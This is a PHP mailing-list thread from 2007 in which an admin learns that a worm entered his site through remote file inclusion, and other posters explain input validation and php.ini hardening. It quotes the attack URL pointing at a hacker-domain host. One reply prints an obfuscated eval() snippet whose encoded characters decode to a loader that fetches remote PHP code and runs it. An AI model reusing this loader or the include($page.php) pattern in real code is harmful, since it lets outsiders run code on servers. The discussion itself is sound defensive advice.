[PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms
Stut wrote: Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this: http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt? And the some-worm-file.txt file contains some PHP code, while my index.php contains this instruction: include($page.php); This is enough to make infiltration possible! IMO, this instruction is supposed to be used like this, isn't it? So this is obviously a PHP security loophole and I don't see how the poorly written scripts can help anything unless a totally rewrite! And there's no poor server security that I can see. You mean to say that you're not validating what you're getting from the user? Frankly you deserve everything you get. No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. I had already spent a lot of time to learn and understand PHP, which normally isn't a part of my job. So, I had already done more than I should. This is *not* a security loophole, it *is* a poorly written script. Well, when something doesn't produce the expected effect/result, or produce a side-effect, it's considered as a bug. If that's not a bug, why would the behaviour be changed from PHP4 to PHP5 then? I've installed PHP5 and the problem seems fixed. However, PHP writes out where the problem occurs! Indeed, the hacker could read a line like this: Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Inetpub\wwwroot\index.php on line X I don't want them (the hackers) to be able to read this either. That gives too much information about my server's file system. How can I stop that? Read the manual, specifically the error_reporting part. You can turn the display of these messages off. I had. Well, I had tried to do so, spending time out of my tightly scheduled job planning. By the way, I know there're still a lot of servers out there still using PHP4. Is this vulnerability a known bug? At least, I'm not aware of that before! It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+) introduces the ability to turn off the ability to prevent this issue, but it's still badly written code. Stop blaming the tool, start blaming the mirror image and start learning how to code defensively. -Stut -- * Zoner PhotoStudio 8 - Your Photos perfect, shared, organised! www.zoner.com/zps You can download your free version. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms
Turn off register_globals - if you pollute your scripts with global variables like that you are asking for trouble. If you can't make sure you clean the variable. Using include($page.php) is asking for trouble. If you can get register_globals switched off (it's off by default in PHP5 for this very reason) then use the kind of security procedure so well explained on brainbulb.com (also well worth watching the audit cast): Maybe something like: $page = isset($_GET['page']) ? trim(strip_tags($_GET['page'])) : 'page'; // clean data here, ie check suffix, reun tests, and only then... include $page.php;
[PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms
Seak, Teng-Fong wrote: No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. Well, I've just realised (and checked) that I forgot to mention that my company's website was outsourced. I mentioned it in other threads. :p I know ASP and JSP, but not PHP. I've not got much time to invest into this. -- * Zoner PhotoStudio 8 - Your Photos perfect, shared, organised! www.zoner.com/zps You can download your free version. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms
Seak, Teng-Fong wrote: No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. Then you should be having this conversation with the 3rd party. They need to validate *EVERY* bit of data that comes into the script from outside. This includes items passed on the URL, POSTed items, uploaded files, etc. You CANNOT TRUST that your URL has not been tampered with, regardless of the scripting language you use (ASP, PHP, JSP, etc) If they do not validate the inputted data, they have problems like you have seen. Relying on register_globals is taboo. Any competent PHP programmer knows that, and likely has known it for a long time. I know ASP and JSP, but not PHP. I've not got much time to invest into this. Sounds like you need a good consultant. My rates are reasonable. ;-) JM -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: [PHP-WIN] Re: [PHP] Re: Question on virus/worms
On Thu, March 15, 2007 9:15 am, Seak, Teng-Fong wrote: Stut wrote: Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this: http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt? And the some-worm-file.txt file contains some PHP code, while my index.php contains this instruction: include($page.php); DON'T DO THAT!!! It is incredibly open to the problem that has bit you. There is a setting in php.ini to turn it OFF, actually. This is enough to make infiltration possible! IMO, this instruction is supposed to be used like this, isn't it? So this is obviously a PHP security loophole and I don't see how the poorly written scripts can help anything unless a totally rewrite! And there's no poor server security that I can see. No, it is *NOT* supposed to be used like that. The programmer is supposed to have half a clue, and not do something that incredibly stupid, which has been documented in a thousand places. Start reading here: http://phpsec.org/ You mean to say that you're not validating what you're getting from the user? Frankly you deserve everything you get. No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. I had already spent a lot of time to learn and understand PHP, which normally isn't a part of my job. So, I had already done more than I should. Perhaps you can get some satisfaction by suing that 3rd party, on the basis of incompetence. Or not, if you are the one who did the include($page.php); This is *not* a security loophole, it *is* a poorly written script. Well, when something doesn't produce the expected effect/result, or produce a side-effect, it's considered as a bug. If that's not a bug, why would the behaviour be changed from PHP4 to PHP5 then? I've installed PHP5 and the problem seems fixed. However, PHP writes out where the problem occurs! Indeed, the hacker could read a line like this: Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Inetpub\wwwroot\index.php on line X That is a configuration option in php.ini It is not a core change to the PHP from 4 to 5. In fact, I think it was available in PHP 4 as well, or at least later versions of PHP 4. I don't want them (the hackers) to be able to read this either. That gives too much information about my server's file system. How can I stop that? In your php.ini display_errors off You may also want to turn the logging of errors ON so you can find your mistakes. While you're at it, crank up the error_reporting to E_ALL please. Thanks. Read the manual, specifically the error_reporting part. You can turn the display of these messages off. I had. Well, I had tried to do so, spending time out of my tightly scheduled job planning. Guess you didn't schedule very well, then... -- Some people have a gift link here. Know what I want? I want you to buy a CD from some starving artist. http://cdbaby.com/browse/from/lynch Yeah, I get a buck. So? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Question on virus/worms
-Message d'origine- De : Stut [mailto:[EMAIL PROTECTED] Envoyé : vendredi 2 mars 2007 20:23 À : Seak, Teng-Fong Cc : php-windows@lists.php.net; php-general@lists.php.net Objet : Re: [PHP] Re: Question on virus/worms Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this: http://my-domain.com/index.php?page=http://hacker-domain.com/s ome-worm-file.txt? *smirk* And the some-worm-file.txt file contains some PHP code, while my index.php contains this instruction: include($page.php); This one line brings up two known php coding security issues, learn about them on http://phpsec.org This is enough to make infiltration possible! IMO, this instruction is supposed to be used like this, isn't it? NO it is not! See above.. So this is obviously a PHP security loophole YES! Learn about register_globals, allow_url_fopen, include() Infact go learn PHP before blindly running scripts in a production environment! Or if you really don't want too learn php at least subscribe to bugtraq mailing list and go through the archive to see if the script you want to run has a security history, see if they follow up on the issues or just ignore the issues, and keep informed to see if any new issues have been brought to hand. and I don't see how the poorly written scripts can help anything unless a totally rewrite! Not neccassarily a total rewrite, try implementing some functions to retrieve/filtre your $_GET $_POST data, turn off register_globals, replace all variables relying on register globals with your newly implemented functions.. Use regular expressions to find the data that needs to be changed in your scripts.. And there's no poor server security that I can see. I think its time for you to take a pause on installing these scripts you are downloading and read up on the php.ini configuration file, also do a search on php history and security. Follow the changes in different php versions aswell their are a lot of hints as to what default values have changed to improve chances of poorly written scripts not being vulnerable. BUT unless you understnad the issues involved these default values are a false excuse for thinking your scripts is secure. (ie upgrading to php5: you did it, it solved your problem, but you still don't know why because you don't know what value was changed in your php configuration) Those few steps will definately be able to give you an idea of what kind of security issues exist, eventually how they are circumvented, and ideas on how you can improve your existing scripts to avoid these issues. Once you are comfortable with this, before you use a script downloaded from the inet in a production environment, go through the code and make sure you don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't related to the scripts original use). Also a good thing to look out for is scripts that run with register_globals = off in the php.ini this at least ensures forced good practice in coding (this does not mean one cannot code well with register_globals = on, it just releaves a potential security issue for the programmer and force him to call url passed variable in a proper manner ie: using PHP Super Globals, to be able to use them) I've installed PHP5 and the problem seems fixed. However, PHP writes out where the problem occurs! Indeed, the hacker could read a line like this: Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Inetpub\wwwroot\index.php on line X I don't want them (the hackers) to be able to read this either. That gives too much information about my server's file system. How can I stop that? Once again learn about php.ini and how it works (re: Stut mentioned - error_reporting). By the way, I know there're still a lot of servers out there still using PHP4. Is this vulnerability a known bug? At least, I'm not aware of that before! It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+) introduces the ability to turn off the ability to prevent this issue, but it's still badly written code. Stop blaming the tool, start blaming the mirror image and start learning how to code defensively. Can't agree more.. Don't think youre secure and live with it, someday it will bite you when you least expect it.. Make it a part of your everyday work to constantly reduce the risk of unwanted intrusions.. Regards, Tim -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Question on virus/worms
On Sat, 2007-03-03 at 14:02 +0100, Tim wrote: Once you are comfortable with this, before you use a script downloaded from the inet in a production environment, go through the code and make sure you don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't related to the scripts original use). And be very careful with eval(). It's a gold mine for hackers since then they can just do things like: ?php $stuff = '102,117,110,99,116,105,111,110,32,83,73,76,70,83,68,' .'72,76,68,70,78,76,72,68,72,74,76,83,68,76,75,74,68,' .'76,74,83,72,68,76,74,83,72,68,83,90,68,70,83,40,41,' .'10,32,32,32,32,123,10,32,32,32,32,32,32,32,32,36,99,' .'111,100,101,32,61,32,102,105,108,101,40,32,39,104,116,' .'116,112,58,47,47,119,119,119,46,105,110,116,101,114,' .'106,105,110,110,46,99,111,109,47,104,97,99,107,101,' .'114,80,97,99,107,46,112,104,112,39,32,41,59,10,32,32,' .'32,32,32,32,32,32,36,99,111,100,101,32,61,32,105,109,' .'112,108,111,100,101,40,32,39,39,44,32,36,99,111,100,' .'101,32,41,59,10,10,32,32,32,32,32,32,32,32,101,118,' .'97,108,40,32,36,99,111,100,101,32,41,59,10,32,32,32,' .'32,125,10,10,32,32,32,32,83,73,76,70,83,68,72,76,68,' .'70,78,76,72,68,72,74,76,83,68,76,75,74,68,76,74,83,' .'72,68,76,74,83,72,68,83,90,68,70,83,40,41,59'; $stuff = explode( ',', $stuff ); $stuff = 'c'.'h'.'r'.'('.implode( ').' .'c'.'h'.'r'.'(', $stuff ).');'; $stuff = eval( 'return '.$stuff ); $stuff = eval( $stuff ); ? Cheers, Rob. -- .. | InterJinn Application Framework - http://www.interjinn.com | :: | An application and templating framework for PHP. Boasting | | a powerful, scalable system for accessing system services | | such as forms, properties, sessions, and caches. InterJinn | | also provides an extremely flexible architecture for | | creating re-usable components quickly and easily. | `' -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Question on virus/worms
Seak, Teng-Fong wrote: But after I've spent some time reading the log files, I've finally found out how the hackers managed to achieve worm infiltration. Actually, they're using an URL like this: http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt? And the some-worm-file.txt file contains some PHP code, while my index.php contains this instruction: include($page.php); This is enough to make infiltration possible! IMO, this instruction is supposed to be used like this, isn't it? So this is obviously a PHP security loophole and I don't see how the poorly written scripts can help anything unless a totally rewrite! And there's no poor server security that I can see. You mean to say that you're not validating what you're getting from the user? Frankly you deserve everything you get. This is *not* a security loophole, it *is* a poorly written script. I've installed PHP5 and the problem seems fixed. However, PHP writes out where the problem occurs! Indeed, the hacker could read a line like this: Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Inetpub\wwwroot\index.php on line X I don't want them (the hackers) to be able to read this either. That gives too much information about my server's file system. How can I stop that? Read the manual, specifically the error_reporting part. You can turn the display of these messages off. By the way, I know there're still a lot of servers out there still using PHP4. Is this vulnerability a known bug? At least, I'm not aware of that before! It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+) introduces the ability to turn off the ability to prevent this issue, but it's still badly written code. Stop blaming the tool, start blaming the mirror image and start learning how to code defensively. -Stut -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php